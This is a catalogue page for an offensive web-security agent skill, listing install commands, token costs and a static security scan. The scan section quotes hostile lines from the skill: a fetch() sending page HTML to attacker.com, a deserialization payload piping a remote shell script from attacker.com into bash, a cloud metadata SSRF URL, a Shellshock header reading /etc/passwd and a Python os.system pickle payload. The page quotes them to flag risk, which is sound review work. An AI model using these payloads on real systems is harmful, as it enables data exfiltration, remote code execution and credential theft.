web-exploit-technique

web-exploit-technique is a skill for Claude Code, Codex from AeonDave/malskill. It costs 44 tokens per session (7,242 once invoked), scanned C, original, no licence file.

A methodology for testing web applications for security flaws such as SQL injection, cross-site scripting, server-side request forgery, and unsafe file handling.

In plain words
What is it for?
It is for authorized web security assessments of inputs, uploads, serialization, request handling, and related attack paths.
Why use it?
It helps testers validate whether common web vulnerabilities have real impact and whether protections such as WAFs and parsers behave safely.

Skill for Claude CodeCodex

Which agent this was written for is unclear — body not stored (licence); the path alone says nothing.

Good fit It is for authorized web security assessments of inputs, uploads, serialization, request handling, and related attack paths.

Compare 6 skills from other repositories ↓
Install with agentmods
npx agentmods add skills/aeondave/malskill/web-exploit-technique
Install

Getting it into your agent

One page per mod, every tool's command on it. A separate URL per tool would split the same page into five that compete with each other.

Any agent
npx skills add AeonDave/malskill --skill web-exploit-technique
Clone the repo
git clone --depth 1 https://github.com/AeonDave/malskill

Made for: Claude Code, Codex.

Wrote this? Show the measurements

A badge with what this costs and how it scanned, read live from this page, so it follows the numbers instead of freezing them. Markdown for a README, HTML for a documentation site or a project page.

agentmods badge for web-exploit-technique

README.md
[![agentmods](https://agentmods.dev/badge/skills/aeondave/malskill/web-exploit-technique.svg)](https://agentmods.dev/skills/aeondave/malskill/web-exploit-technique)
Your own site
<a href="https://agentmods.dev/skills/aeondave/malskill/web-exploit-technique"><img src="https://agentmods.dev/badge/skills/aeondave/malskill/web-exploit-technique.svg" alt="Measured on agentmods" height="20"></a>
Per session 44 Skills are progressive disclosure: only the name and description are preloaded; the body loads when the skill is used.
When invoked 7,242 The whole file, excluding the scripts and references it only reads on demand.
Security scan C 5 findings. A grade says what 26 rules found in the file — not that it is safe.
Origin unknown No closer match found in the catalogue.
Token cost

What it costs to keep this loaded

Counted locally with the o200k_base tokenizer, which is exact for GPT models; Claude uses its own tokenizer and its counts differ. Treat this as one consistent yardstick across the catalogue rather than a bill. Prices are per million input tokens.

ModelPer sessionOnce invoked
Fable 5.1 $0.00044 $0.07242
Opus 5 $0.00022 $0.03621
Sonnet 5 $0.00009 $0.01448
Haiku 4.5 $0.00004 $0.00724

Measured 4d ago against content hash d5eb233cc9fb, method: parsed. Prices are Anthropic first-party input rates as of 2026-09-08, from the pricing page.

Security

Grade C, and why

web-exploit-technique scanned grade C with 5 findings against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured 4d ago.

A static scan of the body, not an audit. Every finding is printed with the line that produced it so you can judge whether it matters here. A mod is markdown that instructs an agent; that is exactly why what it instructs is worth reading.

Sends data to an external URLlowData exfiltration

A POST to an outside endpoint may be telemetry or may be exfiltration; either way the mod talks to somewhere, and you should know where.

fetch('https://attacker.com/page', {method:'POST', body:document.documentElement.outerHTML})

Downgraded: this mod is about security review, or the phrase is quoted, so it is likely naming the pattern rather than instructing it.

Downloads and executes remote codemediumSupply chain

curl | sh runs whatever the server returns today, which is not necessarily what it returned when this was reviewed.

java -jar ysoserial.jar CommonsCollections6 'curl http://attacker.com/shell.sh | bash' > payload.ser

Downgraded: this mod is about security review, or the phrase is quoted, so it is likely naming the pattern rather than instructing it.

Cloud metadata endpointmediumServer-side request forgery

One request to 169.254.169.254 can return temporary IAM credentials.

url=http://169.254.169.254/latest/meta-data/

Downgraded: this mod is about security review, or the phrase is quoted, so it is likely naming the pattern rather than instructing it.

Makes network callslowCapability

Not a fault in itself. Listed so you know the mod talks to something, and to what.

curl -s http://target/cgi-bin/status -H 'User-Agent: () { :;}; echo; /bin/cat /etc/passwd'

Runs shell commandslowCapability

Expected in a hook, worth knowing in a rule or an instructions file.

def __reduce__(self): return (os.system, ("id > /tmp/pwn",))
offensive-techniques/web-exploit-technique/SKILL.md · 677 lines

The source is not reproduced here

No licence file

A repository with no LICENSE is all rights reserved by default, so the body is not copied here. The metadata, the measurements and the link are.

Read it on GitHub

Changes

What this file has done since we first saw it

Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.

  1. 4d ago First seen · 677 lines · 44 tokens per session scan C d5eb233cc9fb

Subscribe to this mod's changes

web-exploit-technique is a skill published in the GitHub repository AeonDave/malskill (18 stars, last pushed 3d ago), with no licence file. It adds 44 tokens to every session and 7,242 once invoked, about $0.0002 per session on Opus 5. A static security scan graded it C with 5 findings (sends data to an external url, downloads and executes remote code, cloud metadata endpoint). No closer match exists in the catalogue, so it is treated as the original; first seen 2026-09-03.

Related

Other skills, from other repositories

build-mcp-server

This skill should be used when the user asks to "build an MCP server", "create an MCP", "make an MCP integration", "wrap an API for Claude", "expose tools to Claude", "make an MCP app", or discusses building something with the Model Context Protocol. It is the entry point for MCP server development — it interrogates…

anthropics/claude-plugins-official · 111 tokens

aspnet-core

Build, debug, modernize, or review ASP.NET Core applications with correct hosting, middleware, security, configuration, logging, and deployment patterns on current .NET. USE FOR: working on ASP.NET Core apps, services, or middleware; changing auth, routing, configuration, hosting, or deployment behavior; deciding…

managedcode/dotnet-skills · 122 tokens

replication-api

Use the AEM 6.5 LTS Replication API for programmatic content activation, deactivation, and replication status management.

adobe/skills · 30 tokens

remove-deprecated-api

AEM Cloud Service expert skill — migrate deprecated and removed Java APIs to comply with AEM as a Cloud Service enforcement policies. Detection is plugin-driven, not table-driven: the skill runs the AEM Analyser Maven Plugin (com.adobe.aem:aemanalyser-maven-plugin) at its latest published version against the project…

adobe/skills · 174 tokens

yida-data-management

A tool for querying, adding, and updating Yida form records, child tables, process records, and task-center data. It keeps ordinary forms and approval workflows on their separate data interfaces.

openyida/openyida · 60 tokens

yida-canvas-data-binding

A method for connecting a YidaCodeCanvas page to real data from Yida forms, connectors, or same-site APIs. YidaCodeCanvas is the component used to run custom React pages inside Yida.

openyida/openyida · 134 tokens